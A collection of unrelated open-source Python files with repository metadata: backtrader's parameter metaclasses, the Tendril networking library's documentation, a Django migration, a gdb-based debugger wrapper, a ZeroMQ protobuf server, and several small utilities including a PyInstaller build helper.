    deriving new subclasses that merge in additional pairs (this is the
    machinery behind params/plotinfo/plotlines declarations).
    '''
    # class-level accessors; _derive() overrides these on each new subclass
    _getpairsbase = classmethod(lambda cls: OrderedDict())
    _getpairs = classmethod(lambda cls: OrderedDict())
    _getrecurse = classmethod(lambda cls: False)

    @classmethod
    def _derive(cls, name, info, otherbases, recurse=False):
        '''Create and return a new subclass named '<cls>_<name>' whose
        pairs are cls's pairs updated with *otherbases*' pairs and *info*.
        The new class is also published on cls's module (for pickling).'''
        # collect the 3 set of infos
        # info = OrderedDict(info)
        baseinfo = cls._getpairs().copy()
        obasesinfo = OrderedDict()
        for obase in otherbases:
            # other bases may be plain tuples/dicts or AutoInfoClass-likes
            if isinstance(obase, (tuple, dict)):
                obasesinfo.update(obase)
            else:
                obasesinfo.update(obase._getpairs())

        # update the info of this class (base) with that from the other bases
        baseinfo.update(obasesinfo)

        # The info of the new class is a copy of the full base info
        # plus and update from parameter
        clsinfo = baseinfo.copy()
        clsinfo.update(info)

        # The new items to update/set are those from the otherbase plus the new
        info2add = obasesinfo.copy()
        info2add.update(info)

        clsmodule = sys.modules[cls.__module__]
        newclsname = str(cls.__name__ + '_' + name)  # str - Python 2/3 compat

        # This loop makes sure that if the name has already been defined, a new
        # unique name is found. A collision example is in the plotlines names
        # definitions of bt.indicators.MACD and bt.talib.MACD. Both end up
        # defining a MACD_pl_macd and this makes it impossible for the pickle
        # module to send results over a multiprocessing channel
        namecounter = 1
        while hasattr(clsmodule, newclsname):
            newclsname += str(namecounter)
            namecounter += 1

        newcls = type(newclsname, (cls,), {})
        setattr(clsmodule, newclsname, newcls)

        # freeze the merged pair sets onto the new class via closures
        setattr(newcls, '_getpairsbase',
                classmethod(lambda cls: baseinfo.copy()))
        setattr(newcls, '_getpairs', classmethod(lambda cls: clsinfo.copy()))
        setattr(newcls, '_getrecurse', classmethod(lambda cls: recurse))

        for infoname, infoval in info2add.items():
            if recurse:
                # each value is itself an AutoInfoClass-like to be derived
                recursecls = getattr(newcls, infoname, AutoInfoClass)
                infoval = recursecls._derive(name + '_' + infoname,
                                             infoval,
                                             [])

            setattr(newcls, infoname, infoval)

        return newcls

    def isdefault(self, pname):
        # True if *pname* still holds its declared default value
        return self._get(pname) == self._getkwargsdefault()[pname]

    def notdefault(self, pname):
        # True if *pname* has been overridden away from its default
        return self._get(pname) != self._getkwargsdefault()[pname]

    def _get(self, name, default=None):
        return getattr(self, name, default)

    @classmethod
    def _getkwargsdefault(cls):
        # mapping of declared names to their default values
        return cls._getpairs()

    @classmethod
    def _getkeys(cls):
        return cls._getpairs().keys()

    @classmethod
    def _getdefaults(cls):
        return list(cls._getpairs().values())

    @classmethod
    def _getitems(cls):
        return cls._getpairs().items()

    @classmethod
    def _gettuple(cls):
        return tuple(cls._getpairs().items())

    def _getkwargs(self, skip_=False):
        # current (possibly overridden) values; skip_ drops '_'-prefixed names
        l = [
            (x, getattr(self, x))
            for x in self._getkeys() if not skip_ or not x.startswith('_')]
        return OrderedDict(l)

    def _getvalues(self):
        return [getattr(self, x) for x in self._getkeys()]

    def __new__(cls, *args, **kwargs):
        obj = super(AutoInfoClass, cls).__new__(cls, *args, **kwargs)

        if cls._getrecurse():
            # instantiate nested AutoInfoClass values per instance
            for infoname in obj._getkeys():
                recursecls = getattr(cls, infoname)
                setattr(obj, infoname, recursecls())

        return obj
class MetaParams(MetaBase):
    '''
    Metaclass that collects the 'params', 'packages' and 'frompackages'
    declarations of a class and all its bases, derives an AutoInfoClass
    subclass for the params, and -- in donew -- imports the requested
    packages and fills a params instance from matching kwargs before
    __init__ runs (available as self.params / self.p).
    '''
    def __new__(meta, name, bases, dct):
        # Remove params from class definition to avoid inheritance
        # (and hence "repetition")
        newparams = dct.pop('params', ())

        packs = 'packages'
        newpackages = tuple(dct.pop(packs, ()))  # remove before creation

        fpacks = 'frompackages'
        fnewpackages = tuple(dct.pop(fpacks, ()))  # remove before creation

        # Create the new class - this pulls predefined "params"
        cls = super(MetaParams, meta).__new__(meta, name, bases, dct)

        # Pulls the param class out of it - default is the empty class
        params = getattr(cls, 'params', AutoInfoClass)

        # Pulls the packages class out of it - default is the empty class
        packages = tuple(getattr(cls, packs, ()))
        fpackages = tuple(getattr(cls, fpacks, ()))

        # get extra (to the right) base classes which have a param attribute
        morebasesparams = [x.params for x in bases[1:] if hasattr(x, 'params')]

        # Get extra packages, add them to the packages and put all in the class
        for y in [x.packages for x in bases[1:] if hasattr(x, packs)]:
            packages += tuple(y)

        for y in [x.frompackages for x in bases[1:] if hasattr(x, fpacks)]:
            fpackages += tuple(y)

        cls.packages = packages + newpackages
        cls.frompackages = fpackages + fnewpackages

        # Subclass and store the newly derived params class
        cls.params = params._derive(name, newparams, morebasesparams)

        return cls

    def donew(cls, *args, **kwargs):
        clsmod = sys.modules[cls.__module__]
        # import specified packages
        for p in cls.packages:
            # each entry is either 'name' or ('name', 'alias')
            if isinstance(p, (tuple, list)):
                p, palias = p
            else:
                palias = p

            pmod = __import__(p)

            plevels = p.split('.')
            if p == palias and len(plevels) > 1:  # 'os.path' not aliased
                setattr(clsmod, pmod.__name__, pmod)  # set 'os' in module

            else:  # aliased and/or dots
                for plevel in plevels[1:]:  # recurse down the mod
                    pmod = getattr(pmod, plevel)

                setattr(clsmod, palias, pmod)

        # import from specified packages - the 2nd part is a string or iterable
        for p, frompackage in cls.frompackages:
            if isinstance(frompackage, string_types):
                frompackage = (frompackage,)  # make it a tuple

            for fp in frompackage:
                if isinstance(fp, (tuple, list)):
                    fp, falias = fp
                else:
                    fp, falias = fp, fp  # assumed is string

                # complain "not string" without fp (unicode vs bytes)
                pmod = __import__(p, fromlist=[str(fp)])
                pattr = getattr(pmod, fp)
                setattr(clsmod, falias, pattr)
                # also publish the imported name on every base's module
                for basecls in cls.__bases__:
                    setattr(sys.modules[basecls.__module__], falias, pattr)

        # Create params and set the values from the kwargs
        params = cls.params()
        for pname, pdef in cls.params._getitems():
            # matching kwargs are consumed here and never reach __init__
            setattr(params, pname, kwargs.pop(pname, pdef))

        # Create the object and set the params in place
        _obj, args, kwargs = super(MetaParams, cls).donew(*args, **kwargs)
        _obj.params = params
        _obj.p = params  # shorter alias

        # Parameter values have now been set before __init__
        return _obj, args, kwargs
class ParamsBase(with_metaclass(MetaParams, object)):
    '''Convenience base class: subclass this to get `params` support
    without declaring the MetaParams metaclass explicitly.'''
    pass  # stub to allow easy subclassing without metaclasses
class ItemCollection(object):
    '''
    Holds a collection of items that can be reached by

      - Index
      - Name (if set in the append operation)

    Named items are additionally exposed as attributes of the collection.
    '''
    def __init__(self):
        self._items = list()
        self._names = list()

    def __len__(self):
        return len(self._items)

    def append(self, item, name=None):
        '''Add *item*; if *name* is given, also register it for by-name and
        attribute access.'''
        # BUG FIX: the original called setattr unconditionally, which raises
        # TypeError for the default name=None (attribute names must be
        # strings); only bind when a usable name was supplied
        if name:
            setattr(self, name, item)
            self._names.append(name)
        self._items.append(item)

    def __getitem__(self, key):
        return self._items[key]

    def getnames(self):
        '''Return the list of registered names (unnamed items excluded).'''
        return self._names

    def getitems(self):
        '''Return (name, item) pairs for the named items.'''
        return zip(self._names, self._items)

    def getbyname(self, name):
        '''Return the item registered under *name* (raises ValueError if
        absent).'''
        idx = self._names.index(name)
        return self._items[idx]
|
mementum/backtrader
|
backtrader/metabase.py
|
Python
|
gpl-3.0
| 11,160
|
## Copyright (C) 2012 by Kevin L. Mitchell <klmitch@mit.edu>
##
## This program is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see
## <http://www.gnu.org/licenses/>.
"""
==============================================
Tendril Frame-based Network Connection Tracker
==============================================
Tendril is a network communication library based on two main features:
it is based on sending and receiving frames, and it tracks the state
of an abstract connection as defined by the application. Tendril is
designed to be easy to use: creating an application requires
subclassing the ``Application`` class and providing an implementation
for the recv_frame() method; then get a ``TendrilManager`` class
instance and start it, and Tendril manages the rest.
Tendril Concepts
================
Frames
------
Tendril is based on the concept of passing around frames or packets of
data. The fact is, most network protocols are based on sending and
receiving frames; for instance, in the SMTP protocol used for sending
email, the sender will start off sending the frame "MAIL FROM
email@example.com" followed by a line termination sequence (a carriage
return followed by a newline). The SMTP server will then respond with
another frame acknowledging the "MAIL FROM" frame, and that frame will
also end with a line termination sequence. Thus, even though SMTP is
defined on top of the TCP protocol, which provides an undivided stream
of data between the client and server, a framing boundary is imposed
upon it--in this case, the carriage return followed by a newline that
terminates each frame.
Tendril includes the concept of *framers*. A framer is nothing more
than a subclass of ``Framer`` which has one method which extracts a
single frame from the stream of undifferentiated data, and another
method which converts a frame into an appropriate representation. In
the case of the SMTP protocol exchange above, the ``frameify()``
method finds each line terminated by the carriage return-newline pair,
strips off those characters, and returns just the frame. In the same
way, the corresponding ``streamify()`` method takes the frame and
appends a carriage return-newline pair.
For text-based protocols such as SMTP, this may seem like overkill.
However, for binary-based protocols, a lot of code is dedicated to
determining the boundaries between frames, and in some cases even
decoding the frame. Tendril's concept of a framer for a connection
enables the framing logic to be isolated from the rest of the
application, and even reused: Tendril comes with several pre-built
framers, including framers designed to work with a text-based protocol
such as SMTP.
Another important advantage of the framer concept is the ability to
switch between framers as needed. Taking again the example of the
SMTP protocol--the actual email data is transferred to the server by
the client first sending a "DATA" frame; the server responds
indicating that it is ready to begin receiving the message data, and
then the client simply sends the message data, ending it with a line
containing only a single period ("."). In this case, an SMTP server
application based on Tendril may wish to receive the message data as a
single frame; it can do this by creating a framer which buffers stream
data until it sees that ending sentinel (the period on a line by
itself), then returns the whole message as a single frame. Once the
server receives the "DATA" frame from the client, all it has to do is
temporarily switch out the framer in use for the receiving side of the
connection, then switch it back to the standard line-based framer once
it has received the message frame.
Tendril allows for different framers to be used on the receiving side
and sending side of the connection. This could be used in a case like
the SMTP server example cited above, where the server still wishes to
send line-oriented frames to the client, even while buffering a
message data frame. In addition, although the provided framers deal
with byte data, Tendril itself treats the frames as opaque;
applications can use this to build a framer that additionally parses a
given frame into a class object that the rest of the application then
processes as necessary.
Connection Tracking
-------------------
Tendril is also based on the concept of tracking connection state.
For connection-oriented protocols such as TCP, obviously, this is not
a big problem; however, Tendril is also designed to support
connectionless protocols such as UDP, where some applications need to
manage state information relevant to a given exchange. As an
admittedly contrived example, consider DNS, which is based on UDP. A
client of the DNS system will send a request to a DNS server over UDP;
when a response is received from that DNS server, the connection state
information tracked by Tendril can help connect that response with the
appropriate request, ensuring that the response goes to the right
place.
This connection state tracking is primarily intended to assist
applications which desire to be available over both
connection-oriented protocols such as TCP and over connectionless
protocols such as UDP. Although Tendril does not address reliability
or frame ordering, its connection state tracking eases the
implementation of an application which utilizes both types of
protocols.
Extensibility
-------------
Careful readers may have noticed the use of the terms, "such as TCP"
and "such as UDP." Although Tendril only has built-in support for TCP
and UDP connections, it is possible to extend Tendril to support other
protocols. All that is required is to create subclasses of
``Tendril`` (representing an individual connection) and of
``TendrilManager`` (which accepts and creates connections and manages
any necessary socket data flows), and to register the
``TendrilManager`` subclasses as ``pkg_resources`` entry points under
the ``tendril.manager`` namespace. See the ``setup.py`` for Tendril
for an example of how this may be done.
In addition to allowing Tendril to support protocols other than TCP
and UDP, it is also possible to implement new framers by subclassing
the ``Framer`` class. (Note: as Tendril deals with ``Framer``
objects, it is not necessary to register these framers using
``pkg_resources`` entry points.) Objects of these classes may then
simply be assigned to the appropriate ``framers`` attribute on the
``Tendril`` instance representing the connection.
Advanced Interfaces
-------------------
Tendril also provides an advanced interface that allows a given raw
socket to be "wrapped." Using this feature, an ordinary TCP socket
could be converted into an SSL socket. Other uses for this interface
are possible, such as setting socket options for the socket. Tendril
also provides an interface to allow multiple of these wrapper
functions to be called in a given order.
Standard Usage
==============
The first step in using Tendril is to define an application by
subclassing the ``Application`` class. (Subclassing is not strictly
necessary--Tendril uses Python's standard ``abc`` package for defining
abstract base classes--but using subclassing will pull in a few
helpful and/or required methods.) The subclass need merely implement
the recv_frame() method, which will be called when a frame is
received. The ``Application`` subclass constructor itself can be the
*acceptor* to be used by Tendril (more on acceptors in a moment).
Once the ``Application`` subclass has been created, the developer then
needs to get a ``TendrilManager`` instance, using the
``get_manager()`` factory function. The exact call to
``get_manager()`` depends on the needs; for making outgoing
connections, simply calling ``get_manager("tcp")`` is sufficient. If
listening on a port or making an outgoing connection from a specific
address and/or port is desired, the second argument to
``get_manager()`` may be a tuple of the desired local IP address and
the port number (i.e., ``("127.0.0.1", 80)``).
All managers must be started, and ``get_manager()`` does not start the
manager by itself. Check the manager's ``running`` attribute to see
if the manager is already running, and if it is not, call its
``start()`` method. To accept connections, pass ``start()`` the
*acceptor* (usually the ``Application`` subclass). The ``start()``
method also accepts a *wrapper*, which will be called with the
listening socket when it is created.
If, instead of accepting connections (as a server would do), the
desire is to make outgoing connections, simply call ``start()`` with
no arguments, then call the ``connect()`` method of the manager. This
method takes the *target* of the connection (i.e., the IP address and
port number, as a tuple) and the *acceptor*. (It also has an optional
*wrapper*, which will be called with the outgoing socket just prior to
initiating the connection.)
Acceptors
---------
An *acceptor* is simply a callable taking a single argument--the
``Tendril`` instance representing the connection--and returning an
instance of a subclass of ``Application``, which will be assigned to
the ``application`` attribute of the ``Tendril`` instance. The
acceptor initializes the application; it also has the opportunity to
manipulate that ``Tendril``, such as setting framers, calling the
``Tendril`` instance's ``wrap()`` method, or simply closing the
connection.
Although the ``TendrilManager`` does not provide the opportunity to
pass arguments to the acceptor, it is certainly possible to do so.
The standard Python ``functools.partial()`` is one obvious interface,
but Tendril additionally provides its own ``TendrilPartial`` utility;
the advantage of ``TendrilPartial`` is that the positional argument
passed to the acceptor--the ``Tendril`` instance--will be the first
positional argument, rather than the last one, as would be the case
with ``functools.partial()``.
Wrappers
--------
A *wrapper* is simply a callable again taking a single argument--in
this case, the socket object--and returning a wrapped version of that
argument; that wrapped version of the socket will then be used in
subsequent network calls. A wrapper which manipulates socket options
can simply return the socket object which was passed in, while one
which performs SSL encapsulation can return the SSL wrapper. Again,
although there is no opportunity to pass arguments to the wrapper in a
manager ``start()`` or ``connect()`` call (or a ``Tendril`` object's
``wrap()`` call), ``functools.partial()`` or Tendril's
``TendrilPartial`` utility can be used. In particular, in conjunction
with ``TendrilPartial``, the ``ssl.wrap_socket()`` call can be used as
a socket wrapper directly, enabling an SSL connection to be set up
easily.
Of course, it may be necessary to perform multiple "wrapping"
activities on a connection, such as setting socket options followed by
wrapping the socket in an SSL connection. For this case, Tendril
provides the ``WrapperChain``; it can be initialized in the same way
that ``TendrilPartial`` is, but additional wrappers can be added by
calling the ``chain()`` method; when called, the ``WrapperChain``
object will call each wrapper in the order defined, returning the
final wrapped socket in the end.
"""
from application import *
from connection import *
from framers import *
from manager import *
from utils import *
# Aggregate the public API of every submodule.  The bare submodule names
# (application, connection, ...) are usable here because importing a
# submodule binds it as an attribute of the package, and this __init__'s
# globals are the package namespace.
__all__ = (application.__all__ + connection.__all__ + framers.__all__ +
           manager.__all__ + utils.__all__)
|
klmitch/tendril
|
tendril/__init__.py
|
Python
|
gpl-3.0
| 12,025
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-26 21:00
from __future__ import unicode_literals
from django.db import migrations, models
import image_cropping.fields
class Migration(migrations.Migration):
    """Add two crop-ratio fields (hero 1600x484, main 600x400) and an
    is_hero flag to the gardenphoto model.

    Auto-generated by Django 1.11.3; do not edit operations by hand.
    """
    dependencies = [
        ('gardens', '0009_auto_20170726_2055'),
    ]
    operations = [
        migrations.AddField(
            model_name='gardenphoto',
            name='hero',
            # ImageRatioField stores crop coordinates against the 'image' field.
            field=image_cropping.fields.ImageRatioField('image', '1600x484', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='hero'),
        ),
        migrations.AddField(
            model_name='gardenphoto',
            name='is_hero',
            field=models.BooleanField(default=False, verbose_name='Hero Image'),
            # default was only supplied to populate existing rows.
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='gardenphoto',
            name='main',
            field=image_cropping.fields.ImageRatioField('image', '600x400', adapt_rotation=False, allow_fullsize=False, free_crop=False, help_text=None, hide_image_field=False, size_warning=False, verbose_name='main'),
        ),
    ]
|
bengosney/rhgd3
|
gardens/migrations/0010_auto_20170726_2100.py
|
Python
|
gpl-3.0
| 1,195
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Jakub Beranek
#
# This file is part of Devi.
#
# Devi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License, or
# (at your option) any later version.
#
# Devi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Devi. If not, see <http://www.gnu.org/licenses/>.
#
import os
import threading
import debugger.util as util
from debugger.debugger_api import StartupInfo
from debugger.enums import ProcessState, DebuggerState
from debugger.mi.breakpoint_manager import BreakpointManager
from debugger.mi.communicator import Communicator
from debugger.mi.file_manager import FileManager
from debugger.mi.heap_manager import HeapManager
from debugger.mi.io_manager import IOManager
from debugger.mi.thread_manager import ThreadManager
from debugger.mi.variable_manager import VariableManager
from debugger import debugger_api
# Fail fast at import time if the allocation-hook shared library has not
# been built: launch() LD_PRELOADs it into the debuggee.
# NOTE(review): raising BaseException (not Exception) means ordinary
# `except Exception` handlers will not catch this — confirm that is intended.
shlib_path = util.get_root_path("build/debugger/liballochook.so")
if not os.path.isfile(shlib_path):
    raise BaseException(
        "liballochook.so is missing in {}. Please run install.sh."
        "".format(os.path.dirname(shlib_path))
    )
class MiDebugger(debugger_api.Debugger):
    """Debugger implementation backed by gdb's MI (machine interface).

    Owns a ``Communicator`` (the gdb process + MI protocol) and a set of
    per-concern managers; translates gdb state changes into
    ``on_process_state_changed`` notifications.
    """
    def __init__(self):
        super(MiDebugger, self).__init__()
        self.communicator = Communicator()
        # React to gdb-reported process state transitions (stopped/exited/...).
        self.communicator.on_process_change.subscribe(
            self._handle_process_state)
        self.io_manager = IOManager()
        self.breakpoint_manager = BreakpointManager(self)
        self.file_manager = FileManager(self)
        self.thread_manager = ThreadManager(self)
        self.variable_manager = VariableManager(self)
        self.heap_manager = HeapManager(self)
        # Serializes teardown: an Exited event from gdb and an explicit
        # quit_program() call can both reach _cleanup_program().
        self.exit_lock = threading.RLock()
        self.binary_path = None
    def _handle_process_state(self, output):
        """Translate a gdb state-change event into API notifications.

        Runs on the communicator's event path, not the caller's thread.

        @type output: mi.communicator.StateOutput
        """
        util.Logger.debug("Process state changed: {0}".format(output.state))
        self.process_state = output.state
        if output.state == ProcessState.Exited:
            self._cleanup_program()
            self._on_program_ended(output.exit_code)
        elif output.state == ProcessState.Stopped:
            # Stopped events carry the stop reason (breakpoint, signal, ...).
            self.on_process_state_changed.notify(
                output.state,
                debugger_api.ProcessStoppedEventData(output.reason)
            )
        else:
            self.on_process_state_changed.notify(output.state, None)
    def require_state(self, required_state):
        # Raise BadStateError unless `required_state` has been reached.
        if not self.get_state().is_set(required_state):
            raise util.BadStateError(required_state, self.state)
    def get_state(self):
        """Return the debugger's DebuggerState flag set."""
        return self.state
    def get_process_state(self):
        """Return the last observed ProcessState of the debuggee."""
        return self.process_state
    def load_binary(self, binary_path):
        """Start gdb and load *binary_path* with its symbols.

        @rtype: bool -- True when gdb accepted the binary.
        """
        binary_path = os.path.abspath(binary_path)
        self.communicator.start_gdb()
        result = self.communicator.send(
            "-file-exec-and-symbols {0}".format(binary_path))
        util.Logger.debug("Loading program binary {0} succeeded: {1}".format(
            binary_path, result.is_success()))
        if result.is_success():
            self.state.set(DebuggerState.BinaryLoaded)
            # Async MI mode: gdb keeps accepting commands while the
            # debuggee is running (needed for exec_pause).
            self.communicator.send("-gdb-set mi-async on")
            self.binary_path = binary_path
            return True
        else:
            return False
    def launch(self, startup_info=None):
        """Launch the previously loaded binary under gdb.

        Redirects the debuggee's stdio through the IOManager and
        LD_PRELOADs the allocation hook so the heap manager can observe
        allocations.

        @type startup_info: StartupInfo | None
        @rtype: bool
        """
        if startup_info is None:
            startup_info = StartupInfo()
        if startup_info.working_directory == "":
            startup_info.working_directory = os.path.dirname(self.binary_path)
        self.require_state(DebuggerState.BinaryLoaded)
        stdin, stdout, stderr = self.io_manager.handle_io()
        alloc_file = self.heap_manager.watch()
        startup_info.env_vars.append(("DEVI_ALLOC_FILE_PATH", alloc_file))
        startup_info.env_vars.append(("LD_PRELOAD", shlib_path))
        for env_var in startup_info.env_vars:
            self.communicator.send("set environment {}={}".format(
                env_var[0], env_var[1]
            ))
        self.communicator.send("cd {}".format(startup_info.working_directory))
        self.on_process_state_changed.notify(ProcessState.Launching, None)
        # Shell-style redirection inside gdb's `run` wires the debuggee
        # to the IOManager's pipes.
        result = self.communicator.send("run 1>{0} 2>{1} <{2} {3}".format(
            stdout,
            stderr,
            stdin,
            startup_info.cmd_arguments
        ))
        util.Logger.debug("Launching program: {0}".format(result))
        if result:
            self.state.set(DebuggerState.Running)
        return result.is_success()
    def exec_continue(self):
        """Resume the stopped debuggee."""
        self.require_state(DebuggerState.Running)
        self.communicator.send("-exec-continue")
    def exec_pause(self):
        """Interrupt the running debuggee."""
        self.require_state(DebuggerState.Running)
        self.communicator.pause_program()
        self.communicator.send("interrupt")
    def exec_step_over(self):
        """Step one source line, stepping over calls."""
        self.require_state(DebuggerState.Running)
        self.communicator.send("-exec-next")
    def exec_step_in(self):
        """Step one source line, entering calls."""
        self.require_state(DebuggerState.Running)
        self.communicator.send("-exec-step")
    def exec_step_out(self):
        """Run until the current function returns."""
        self.require_state(DebuggerState.Running)
        self.communicator.send("-exec-finish")
    def quit_program(self, return_code=1):
        """Kill the debuggee (no-op when nothing is running)."""
        if not self.state.is_set(DebuggerState.Running):
            return
        self.communicator.quit_program()
        self._cleanup_program()
        self._on_program_ended(return_code)
    def terminate(self):
        """Kill the debuggee and the gdb process itself."""
        self.quit_program()
        self.communicator.kill()
    def _cleanup_program(self):
        # Idempotent teardown of per-run resources; exit_lock guards
        # against the quit_program()/Exited-event race.
        self.exit_lock.acquire()
        try:
            if not self.state.is_set(DebuggerState.Running):
                return
            util.Logger.debug("Cleaning debugged process")
            self.state.unset(DebuggerState.Running)
            self.io_manager.stop_io()
            self.heap_manager.stop()
        finally:
            self.exit_lock.release()
    def _on_program_ended(self, return_code):
        # Record the final state and broadcast the exit code to listeners.
        self.process_state = ProcessState.Exited
        self.on_process_state_changed.notify(
            ProcessState.Exited,
            debugger_api.ProcessExitedEventData(return_code))
|
Kobzol/debug-visualizer
|
debugger/mi/mi_debugger.py
|
Python
|
gpl-3.0
| 6,700
|
# -*- coding: utf-8 -*-
from module.plugins.internal.DeadCrypter import DeadCrypter, create_getInfo
class HotfileComFolder(DeadCrypter):
    # Stub plugin for the defunct Hotfile.com service: DeadCrypter marks
    # every matching link as dead.  Only metadata is declared here.
    __name__ = "HotfileComFolder"
    __type__ = "crypter"
    __version__ = "0.3"
    __pattern__ = r'https?://(?:www\.)?hotfile\.com/list/\w+/\w+'
    __config__ = []
    __description__ = """Hotfile.com folder decrypter plugin"""
    __license__ = "GPLv3"
    __authors__ = [("RaNaN", "RaNaN@pyload.org")]
# Module-level hook used by pyLoad to query link status for this plugin.
getInfo = create_getInfo(HotfileComFolder)
|
sebdelsol/pyload
|
module/plugins/crypter/HotfileComFolder.py
|
Python
|
gpl-3.0
| 511
|
#!/usr/bin/env python
"""server.py.py: Module Description ..."""
from __future__ import print_function
import gevent
import time
import zmq.green as zmq
import ga_messages_pb2 as gmessages
__author__ = "Minos Galanakis"
__license__ = "GPL3"
__version__ = "0.0.1"
__email__ = "minos197@gmail.com"
__project__ = "ga"
__date__ = "19-05-2017"
def compose_ack(ack="ACK"):
    """ Compose a standard acknowledge message.

    :param ack: command string placed in the control section,
                "ACK" or "NACK".
    :returns: a populated gmessages.Message protobuf.
    """
    # Add the metadata
    msg = gmessages.Message()
    msg.metadata.message_type = 0
    msg.metadata.device_id = 0
    msg.metadata.network_id = 0
    msg.metadata.application_id = 0
    msg.metadata.tx_time = int(time.time())
    msg.metadata.sequence = 1
    msg.metadata.periph_count = 0
    msg.metadata.device_name = "Server"
    # Add an ACK command
    msg.control.key = 0
    msg.control.is_indexed = False
    msg.control.cmd = ack
    return msg
def server():
    """Run a blocking 0MQ REP loop on tcp://*:24124.

    Each received payload is parsed as a gmessages.Message and answered
    with an ACK; any parse/print failure is answered with a NACK.
    """
    # Set up port and protocol
    port = "24124"
    binding = "tcp://*:%s" % port
    # Set up 0MQ as Request/Response topology
    context = zmq.Context()
    server_socket = context.socket(zmq.REP)
    # Bind to the socket
    server_socket.bind(binding)
    while True:
        # Receive the message
        message = server_socket.recv()
        try:
            # De-Serialize it
            msg = gmessages.Message()
            msg.ParseFromString(message)
            # Report it
            # NOTE(review): missing space in '"%d"received' below is part of
            # the runtime output; left untouched here.
            print(("Message of type \"%d\"received from \"%s\" "
                   "with %d peripherals") % (msg.metadata.message_type,
                                             msg.metadata.device_name,
                                             msg.metadata.periph_count))
            for p in msg.peripheral:
                print(("Peripheral \"%s\" with id: \"%d\""
                       " contains payload of \"%s\"") % (p.peripheral_name,
                                                         p.peripheral_id,
                                                         repr(p.payload)[1:-1]))
            print("")
            ack = compose_ack("ACK")
        except Exception:
            # Malformed message: reply NACK instead of crashing the loop.
            ack = compose_ack("NACK")
        # Respond to client
        server_socket.send(ack.SerializeToString())
if __name__ == "__main__":
    try:
        # Spawn the server loop as a greenlet and block until it finishes.
        # Bound to a new name: the original rebound `server`, shadowing the
        # server() function itself.
        server_greenlet = gevent.spawn(server)
        server_greenlet.join()
    except KeyboardInterrupt:
        print("Shutting Down Server")
|
minosg/guardian_angel
|
dev/prototyping/server.py
|
Python
|
gpl-3.0
| 2,369
|
# -*- coding: utf-8 -*-
from django.conf import settings
from pyerp.fnd.shortcuts import fnd_render_to_response
from pyerp.fnd.gbl import fnd_global
from pyerp.fnd.utils.version import get_svn_revision, get_version
__svnid__ = '$Id$'
__svn__ = get_svn_revision(__name__)
def display_login_form(request, error_message='', app_path=None, extra_context=None):
    """Render the login page.

    :param request: Django request object.
    :param error_message: message shown to the user on a failed attempt.
    :param app_path: redirect target after login; defaults to the
                     currently requested path.
    :param extra_context: optional dict merged into the template context.
    """
    # Test cookie lets the login POST verify that cookies are enabled.
    request.session.set_test_cookie()
    context = {
        'app_path': app_path or request.get_full_path(),
        'error_message': error_message,
    }
    context.update(extra_context or {})
    return fnd_render_to_response('pub/login/login.html', context)
def login(request):
    """Show the login form, redirecting to the user site's main page
    after a successful login."""
    return display_login_form(request,
                              '',
                              fnd_global.context_prefix + settings.FND_USER_SITE_PREFIX + 'main/')
|
dreams6/pyerpcn
|
pyerp/fnd/functions/pub/login/views.py
|
Python
|
gpl-3.0
| 829
|
import os
import sys
def build_exe(filename, version="1.0.0", description="", author="", modules=None, includes=None, packages="[]", include_files=None, zip_includes=None, icon=None, additional_executables=None, target=None,
              window=True, onefile=True):
    """Build a Windows executable from *filename* via PyInstaller.

    Only *filename*, *window* (adds --noconsole) and *onefile* (adds
    --onefile) influence the generated command; the remaining parameters
    are accepted for interface compatibility with other build back-ends
    and are currently ignored.

    :param filename: script path, or a module object (its __file__ is used).
    """
    # Original used mutable default arguments ([]); use None so a shared
    # list is never accidentally mutated across calls.
    args = []
    if window:
        args.append("--noconsole")
    if onefile:
        args.append("--onefile")
    # Accept a module object as well as a plain path string.
    if hasattr(filename, "__file__"):
        filename = filename.__file__
    cmd = '%s/scripts/pyinstaller.exe %s %s' % (os.path.dirname(sys.executable), " ".join(args), filename)
    print(cmd)
    os.system(cmd)
    print("finish")
|
madsmpedersen/MMPE
|
build_exe/pyinstaller/build_exe.py
|
Python
|
gpl-3.0
| 615
|
#!/usr/bin/env python
'''
ThunderGate - an open source toolkit for PCI bus exploration
Copyright (C) 2015-2016 Saul St. John
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import sys
import subprocess
import platform
import logging
class tglog(logging.Formatter):
    """Formatter that prefixes each record with a one-character severity
    tag, e.g. ``[+] device opened`` for INFO."""

    # log level -> single-character severity marker
    cmap = {logging.NOTSET: '?', logging.DEBUG: '.', logging.INFO: '+',
            logging.WARNING: '-', logging.ERROR: '!', logging.CRITICAL: '*'}

    def format(self, rec):
        """Render *rec* as ``[<tag>] <interpolated message>``."""
        tag = self.cmap[rec.levelno]
        message = rec.msg % rec.args
        return "[%s] %s" % (tag, message)
# Root logger with the tagged formatter above; DEBUG so everything shows.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
formatter = tglog()
ch.setFormatter(formatter)
logger.addHandler(ch)
sys_name = platform.system()
if __name__ == "__main__":
    # Reset cwd to the project root (two levels above this script) so the
    # relative imports and data files below resolve.
    tgdir = sys.argv[0]
    if tgdir != "":
        tgdir = os.path.abspath(tgdir)
        tgdir = os.sep.join(tgdir.split(os.sep)[:-2])
        cwd = os.getcwd()
